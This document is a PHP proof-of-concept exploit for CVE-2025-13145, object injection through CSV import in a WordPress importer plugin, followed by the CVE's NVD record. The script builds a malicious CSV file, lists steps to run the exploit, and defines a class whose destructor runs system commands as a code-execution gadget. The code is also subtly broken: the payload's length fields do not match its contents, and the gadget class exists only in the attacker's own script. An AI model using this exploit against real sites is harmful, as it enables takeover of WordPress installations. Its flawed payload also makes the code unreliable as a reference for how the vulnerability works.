CVE-2025-13145

<?php /** * CVE-2025-13145 PoC - PHP Object Injection via CSV Import * Target: WP Import - Ultimate CSV XML Importer < 7.33.2 * Author: Security Researcher * Note: Requires administrator access */ // Example malicious CSV payload for PHP Object Injection // This payload demonstrates the structure for injecting PHP objects $malicious_payload = 'O:32:"SomeClass":1:{s:4:"data";s:10:";echo "VULNERABLE";//";}'; // CSV structure for import_single_post_as_csv function $csv_content = "post_title,post_content,custom_field\n"; $csv_content .= "Malicious Post,Content with {$malicious_payload},test_value\n"; // Save malicious CSV file file_put_contents('malicious_import.csv', $csv_content); echo "PoC CSV file created: malicious_import.csv\n"; echo "Payload: {$malicious_payload}\n"; echo "\nTo exploit:\n"; echo "1. Login as WordPress administrator\n"; echo "2. Navigate to WP Import plugin settings\n"; echo "3. Upload the malicious_import.csv file\n"; echo "4. Execute import to trigger object injection\n"; // Alternative: Generate POP chain payload for RCE // Requires specific POP chain from installed plugins/themes class EvilClass { public $cmd; public function __destruct() { system($this->cmd); } } // Serialize the evil object $pop_chain = serialize(new EvilClass()); echo "\nPOP Chain Payload: {$pop_chain}\n"; ?>

{"cve": {"id": "CVE-2025-13145", "sourceIdentifier": "[email protected]", "published": "2025-11-19T06:15:47.563", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Import – Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 7.33.1. This is due to deserialization of untrusted data supplied via CSV file imports in the import_single_post_as_csv function within SingleImportExport.php. This makes it possible for authenticated attackers, with administrator-level access or higher, to inject a PHP object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/trunk/SingleImportExport.php#L116", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3397842/wp-ultimate-csv-importer/trunk/SingleImportExport.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5e441699-4c78-4277-8ac1-f33b810e78cb?source=cve", "source": "[email protected]"}]}}